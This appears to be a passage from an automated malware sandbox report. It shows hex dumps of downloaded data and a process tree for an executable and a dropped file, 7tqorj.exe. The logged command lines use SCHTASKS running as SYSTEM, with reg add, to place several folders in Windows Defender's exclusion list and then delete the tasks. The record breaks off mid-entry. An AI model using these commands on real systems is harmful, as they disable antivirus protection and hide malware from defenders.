                                                  2025-01-06 03:51:45 UTC4096INData Raw: 2c 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60
                                                  Data Ascii: ,12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
                                                  2025-01-06 03:51:45 UTC4096INData Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6
                                                  Data Ascii: NNNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
                                                  2025-01-06 03:51:45 UTC4096INData Raw: 75 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60
                                                  Data Ascii: ubpa```b=57%h%8f<`-=S+8-<H/c$m|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
                                                  2025-01-06 03:51:45 UTC4096INData Raw: 61 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d
                                                  Data Ascii: a``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
                                                  2025-01-06 03:51:45 UTC4096INData Raw: 60 ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3
                                                  Data Ascii: `5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
                                                  2025-01-06 03:51:45 UTC4096INData Raw: 62 e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60
                                                  Data Ascii: bjebp````]bp`At``_l+-D^__H|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`
                                                  2025-01-06 03:51:45 UTC4096INData Raw: eb 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70
                                                  Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:22:49:54
                                                  Start date:05/01/2025
                                                  Path:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\2749837485743-7684385786.05.exe"
                                                  Imagebase:0x140000000
                                                  File size:30'885'376 bytes
                                                  MD5 hash:5B695FABFCD1DA54F7C193EF5F11EF6A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:22:50:53
                                                  Start date:05/01/2025
                                                  Path:C:\Users\user\Documents\7tqorj.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Documents\7tqorj.exe
                                                  Imagebase:0x140000000
                                                  File size:133'136 bytes
                                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:22:50:54
                                                  Start date:05/01/2025
                                                  Path:C:\Users\user\Documents\7tqorj.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Documents\7tqorj.exe
                                                  Imagebase:0x140000000
                                                  File size:133'136 bytes
                                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:22:51:01
                                                  Start date:05/01/2025
                                                  Path:C:\Users\user\Documents\7tqorj.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Documents\7tqorj.exe
                                                  Imagebase:0x140000000
                                                  File size:133'136 bytes
                                                  MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:9
                                                  Start time:22:51:12
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff690400000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:22:51:12
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:22:51:12
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:22:51:12
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:22:51:12
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff690400000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:22:51:12
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7641c0000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff690400000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff690400000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:22:51:13
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7641c0000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:22:51:14
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff690400000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:22:51:14
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:22:51:14
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:22:51:14
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:22:51:14
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff690400000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:22:51:14
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:22:51:15
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:32
                                                  Start time:22:51:15
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7641c0000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:33
                                                  Start time:22:51:15
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff690400000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:22:51:15
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:35
                                                  Start time:22:51:15
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:36
                                                  Start time:22:51:15
                                                  Start date:05/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff602720000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
